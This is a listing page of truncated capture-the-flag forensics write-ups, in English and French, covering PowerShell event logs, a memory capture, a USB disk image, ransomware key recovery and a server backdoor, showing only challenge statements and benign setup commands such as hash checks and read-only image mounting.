La gazette de Windows Category : Intro - forensics States It seems that a user is running suspicious Powershell scripts on his machine. Fortunately this machine is logged and we were able to recover the Powershell event log. Find what was sent to the attacker. SHA256(Microsoft-Windows-PowerShell%4Operational.evtx) = 770b92f7c98ffb708c3e364753ee4bb569ccc810dd5891cbaf1363c2063ddd78 Solve Check the integrity of the log file : 1 2 3 sha256sum Microsoft-Windows-PowerShell4Operational.evtx | grep 770b92f7c98ffb708c3e364753ee4bb569ccc810dd5891cbaf1363c2063ddd78 770b92f7c98ffb708c3e364753ee4bb569ccc810dd5891cbaf1363c2063ddd78 Microsoft-Windows-PowerShell4Operational.evtx We will use the evtx tool to parse the .

Thanks to Abyss W4tcher for his volatility install script which allows running volatility in a docker. Ransomémoire Category : forensics Ransomémoire 0/3 - Pour commencer Difficulty : ⭐ States You are preparing to analyze a memory capture and you write down some information about the machine before diving into the analysis: username, machine name, browser used. The flag is in the format FCSC{user name:machine name:browser name} where:

Weird Shell Category: forensics Difficulty : ⭐ States Another user has similar behavior to Windows Gazette (intro category). But this time, to find what was sent to the attacker, you may need more logs. SHA256(Microsoft-Windows-PowerShell%4Operational.evtx) = 7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc SHA256(Security.evtx) = 1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689 Solve We check the integrity of the log files : 1 2 3 4 5 6 7 8 sha256sum Microsoft-Windows-PowerShell4Operational.evtx | grep 7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc 7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc Microsoft-Windows-PowerShell4Operational.evtx sha256sum Security.evtx | grep 1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689 1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689 Security.

The Lost Key Difficulty: Easy Author: Zeecka States The USB key of a Norman terrorist has been recovered. Investigate his support to prevent him from taking action! Solve 1 2 tar xzvf the_lost_key.tar.gz the_lost_key.img A file & fdisk to get information about the dump : 1 2 file the_lost_key.img the_lost_key.img: DOS/MBR boot sector; partition 1 : ID=0x7, start-CHS (0x4,4,1), end-CHS (0x3ff,254,2), startsector 2048, 3909632 sectors 1 2 3 4 5 6 7 8 9 10 fdisk -l the_lost_key.

Pas Un Bon Nom Difficulté : Facile Énoncé J’étais là tranquillou sur mon PC, m’voyez ? Je télécharge des films et tout, m’voyez ? Et alors il y a ce message étrange que je dois payer Dogecoin pour > déchiffrer mes données. Je ne l’ai pas fait… donc maintenant mes données sont chiffrées :( Donc tiens, prends le disque dur, c’est pas comme si il était utile maintenant… Sauf si c’était possible de retrouver la clé utilisée par ce méchant hacker, m’voyez ?

Vivre pas cher Difficulté : Moyen Énoncé Notre serveur a été piraté. C’est une évidence. Ils dévoilent notre code source sans arrêt, dès que nous le mettons à jour. Vous devez trouver l’origine de cette backdoor dès que possible. Annie Massion, Services postaux Solve Mount the image : 1 2 3 sudo modprobe nbd sudo qemu-nbd -r -c /dev/nbd1 cheap-life.img sudo mount -o ro,noload /dev/nbd1p1 /mnt/tmp Solve 1 We are looking for a backdoor :